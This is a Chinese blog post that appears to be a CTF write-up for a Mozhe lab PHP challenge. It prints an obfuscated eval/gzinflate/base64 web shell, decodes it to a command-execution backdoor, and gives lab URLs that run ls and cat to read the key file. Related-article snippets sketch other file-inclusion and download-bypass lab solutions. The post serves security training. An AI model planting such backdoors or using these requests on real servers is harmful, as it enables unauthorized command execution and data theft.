【WEB】PHP代码分析溯源(PHP文件包含)

最新推荐文章于 2021-03-11 15:29:15 发布
最新推荐文章于 2021-03-11 15:29:15 发布
阅读量1.6k 收藏
点赞数
分类专栏: CTF 文章标签: WEB
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u014549283/article/details/81782893
版权

【原题】

https://www.mozhe.cn/bug/detail/T0YyUmZRa1paTkJNQ0JmVWt3Sm13dz09bW96aGUmozhe

【题干】

网页显示源码 eval(gzinflate(base64_decode(&40pNzshXSFCJD3INDHUNDolOjE2wtlawt+MCAA==&))); 

【解法】

在 在线运行PHP网站 中调试得到echo `$_REQUEST[a]`  

于是可以在get参数a里面 加入php命令

浏览目录

 http://219.153.49.228:49116/f.php?a=ls

 可以看到key文件名,然后 

http://219.153.49.228:49116 /f.php?a=cat%20key_1358523395911.php

 查看网页源码可以找到KEY值

pcy190
关注
专栏目录
phpMyAdmin后台文件包含分析溯源
qq_40554015的博客
11-12 3278
phpMyAdmin 漏洞利用汇总:PhpMyAdmin漏洞利用汇总 - 只言 - 博客园 漏洞编号:CVE-2018-12613 背景介绍 phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含逻辑,通过二次编码即可绕过检查,造成远程文件包含漏洞。 一.弱口令登录 root-root 二.利用sql语句,将php代码写入Session文件中 三.包含Session文件 http://219.153.49.228:44273/
墨者学院 - PHP代码分析溯源(第3题)
多崎巡礼的博客
08-03 673
在for 循环中是判断输入的字符是否有存在在1和9之间的数字 如果不存在判断是否等于54975581388 等于则绕过 即 又不能等于数字1-9又要等于54975581388 但是这里在比较的时候就是用弱类型的,所以不要求完全一致。 php在转码时会把16进制转化为十进制.于是把54975581388转化成16进制0xccccccccc 键入 0xccccccccc 输入得到key...
悠久防伪防窜货追溯系统php+mysql版
06-20
系统特性 ① 记录查询次数、查询时间、查询者IP地址。 ② 查询结果提示信息可以后台任意设置。查询结果自动发送到管理员邮箱。 ③ 可批量生成、导入、导出、删除防伪码。支持在线批量上传导入,支持导入其它系统防伪码。(支持格式:txt,xls或xlsx,csv) 此为免费试用版。 正式版支持微信查询,二维码扫描查询,网页输入查询。 正式版演示 www.fwxt.cn
php版防伪防窜货追溯系统
12-29
运行环境: php5.3或以上+mysql+zend 安装成功后直接登录后台即可
PHP文件下载漏洞分析溯源
jeehoon的博客
11-13 226
点击任意一个NBA球星下载,用BP抓包,发现其路径可以修改,题目又提示了key.txt在根目录下,改包如图 获得key
墨者学院-PHP本地包含漏洞代码溯源
JimWu的博客
09-04 328
PHP本地包含漏洞代码溯源 难易程度:★★ 题目类型:WEB安全 使用工具:FireFox浏览器 1.打开靶场,了解本地包含漏洞。 本地包含漏洞是在通过服务器脚本的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,导致意外的文件泄露、恶意代码的注入等 2.F12或右键查看源码,发现r.php的源码。 由于参数p没有做任何校验,从而形成本地包含漏洞。 3.构造url为/...
墨者学院——PHP本地包含漏洞代码溯源
qq_43731011的博客
09-20 410
过关地址 启动环境,进入网址后,在html源码中找到提示 <!--r.php文件源码如下 本关通关key保存在系统根目录the_key_is_here.txt中 -> <?php $p=($_GET["p"].".txt"); $pics=file($p); for($i=0;$i< count($pics);$i++) { echo $pics[$i]; } ?&gt...
WebShell文件上传漏洞分析溯源
02-22
WebShell 文件上传漏洞分析溯源 一、WebShell 文件上传漏洞概述 WebShell 文件上传漏洞是指攻击者通过上传恶意文件(如WebShell)来获取服务器的控制权,从而实现对服务器的攻击和控制。这种漏洞通常存在于Web应用...
PHP魔众一物一码溯源防伪系统 v2.0.0
最新发布
10-21
2. **部署程序**:将压缩包解压后,将`wwwroot`目录下的所有文件上传至服务器的Web根目录。 3. **配置数据库**:根据`install.html`指引,配置系统的数据库连接信息,包括数据库地址、用户名、密码和数据库名。 4....
PHP魔众一物一码溯源防伪系统 v2.1.0
08-15
php源码 魔众一物一码溯源防伪系统支持批量生成、管理防伪码、溯源码,帮助您更好的管理商品防伪码。 魔众一物一码溯源防伪系统,溯源、防伪、一物一码,一套搞定。 2022年10月19日魔众一物一码溯源防伪系统发布v2.1.0版本,增加了以下19个特性: ·[新功能] 模块新增标签属性功能 ·[新功能] OpenApi和Api中间件新增AccessGate ·[新功能] 数据库兼容MySQL8.0 ·[新功能] 富文本标签A新增download属性过滤 ·[新功能] 网站地址配置项 ·[新功能] ProviderTrait新增是否排序自动检测 ·[新功能] 系统升级调用命令容错处理 ·[新功能] 后台登录背景优化 ·[新功能] TextAjaxRequest组件部分属性重构和新增方法 ·[新功能] Request新增isGet方法用于判断GET请求方式 ·[新功能] 随机字符串新增大写和小写可读字符串 ·[新功能] 富文本过滤图片新增data-formula-image属性 ·[新功能] 文件上传表新增大类和分类索引 ·[系统优化] 模块市场显示样式和文案
分享一下我自己做的车牌识别-work.m
08-13
分享一下我自己做的车牌识别-work.m 课程作业,能够实现车牌的定位与字符的分割,
墨者靶场 入门:phpMyAdmin后台文件包含分析溯源
qq_43233085的博客
01-13 864
墨者靶场 入门:phpMyAdmin后台文件包含分析溯源题目背景介绍实训目标解题方向解题步骤 题目 背景介绍 phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含逻辑,通过二次编码即可绕过检查,造成远程文件包含漏洞。 实训目标 1、了解此漏洞形成的原因; 2、掌握此漏洞的利用方式。 解题方向 根据漏洞编号找到相关知识。 解题步骤 启动靶场...
PHP本地包含漏洞代码溯源
cc_de_csdn的博客
08-25 240
根据提示: 服务端获取p的值,加上.txt后缀,使用file函数将文件包含然后读取,由于服务端没有对P过滤导致本地包含漏洞形成 1.r.php存在文件包含漏洞 2.key在the_key_is_here.txt中 3.key在目录 4.p是url的传参,访问的时候使用?p= 5.构造url:ip/r.php?p=/the_key_is_here ->得到KEY ...
墨者学院-PHP文件下载漏洞分析溯源
JimWu的博客
09-04 641
PHP文件下载漏洞分析溯源 难易程度:★★ 题目类型:WEB安全 使用工具:FireFox浏览器、burpsuite 1.打开靶场,根据题目,下载一张图片,发现不用付费,但没什么发现。 2.打开burpsuite,下载一张图片,截包。 3.看到url为/execdownload.php?filename=kb.png,再根据题目提示,key就藏在根目录的txt文件中。 4.send to repe...
php 追溯,一次简单的数据库追溯
weixin_31682031的博客
03-11 113
引子 .今天排查代码,一路飞,到数据库,1$this->slave()->select('sina_user_id, sina_nickname, password')->from(self::Table_User_Info)显然到这里确定了表.user_info;这个文件没有load->database();顾名: slave() 是从库,追溯slave() 果然在这里...
解决方案和项目的关系_区块链溯源防伪追溯系统开发解决方案
weixin_39902870的博客
11-05 499
随着互联网技术的不断成熟,区块链可追溯性已逐渐成为防伪手段的升级版本。由于分布式记账、加密技术和区块链智能合约技术具有去中心化、开放性和透明性、非篡改性和可追溯性等特点,正好满足了商品的可追溯性和防伪要求,弥补了传统防伪技术的局限性。随着大数据时代和物联网时代的到来,区块链可追溯性在产品防伪领域将具有巨大的潜力。新产品可追溯性+区块链系统可以更好地防止假冒伪劣产品的出现。区块链追溯系统的优点是什么...
恶意代码攻击溯源与样本分析详解
本文主要探讨了恶意代码攻击的溯源及恶意样本分析,涵盖了学术界和产业界的视角,涉及特征提取、预处理、相似性计算、同源判定等多个方面,并介绍了产业界的恶意攻击流程及溯源方法。 一. 前言 网络安全事件与恶意...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值